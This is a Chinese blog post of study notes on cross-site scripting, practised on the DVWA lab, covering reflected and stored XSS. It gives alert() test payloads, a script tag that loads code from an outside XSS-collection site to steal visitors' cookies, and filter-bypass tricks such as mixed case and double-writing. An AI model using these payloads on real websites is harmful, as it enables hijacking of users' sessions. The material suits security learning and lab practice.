第二輪學習筆記: XSS跨站腳本漏洞

扎頭髮,兩圈太鬆,三圈太緊,洗澡,往左一點燙死,往右一點凍死,吃泡麪,一桶吃不飽,兩桶吃不完,就像咱們的關係。。。web

----  網易雲熱評安全

 

跨站腳本***(XSS),惡意***者在web頁面插入惡意script代碼,當用戶瀏覽該頁面時,惡意代碼就會被執行,達到***用戶的目的。cookie

造成緣由:程序對輸入和輸出的過濾不嚴格xss

1、反射型XSS:須要欺騙用戶本身點擊連接才能出發XSS代碼ide

一、在輸入窗口輸入123,點擊提交,審查元素,能夠看到提交的內容顯示在了網頁工具

watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=

二、在輸入框輸入:<script>alert('123')</script>,點擊提交,彈出對話框,說明存在漏洞web安全

watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=

2、漏洞利用blog

一、找一個xss平臺,註冊帳號,新建一個項目ip

watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=

watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=

 

 

 

二、複製關鍵代碼:<sCRiPt sRC=https://xss.wtf/ltkW></sCrIpT>,將該代碼複製到存在漏洞的頁面,而後提交it

watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=

 

三、打開xss平臺上建立的項目,咱們能夠獲得DVWA平臺登陸的cookie

 

watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=

 

3、存儲型XSS:用戶只要訪問存在該漏洞的頁面就會觸發

一、在對話框輸入<script>alert('123')</script>,提交,每次刷新頁面都會彈出,說明該處存在xss漏洞

 

watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=

 

二、在對話框輸入xss平臺上生成的代碼<sCRiPt sRC=https://xss.wtf/ltkW></sCrIpT>,點擊提交,只要訪問該頁面的用戶,都會在xss平臺上看到他的cookie信息

watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=

4、xss繞過

一、大小寫繞過,將<script>修改成<ScRipt>

二、雙寫繞過,將<script>修改成<Sc<script>Ript>

三、註釋繞過,將<script>修改成<scri<!--aaa--->pt>

四、實體轉換,將&改成&amp,將<改成&lt,將>改成&gt等等

 

禁止非法,後果自負

歡迎關注公衆號:web安全工具庫

watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=

相關文章
相關標籤/搜索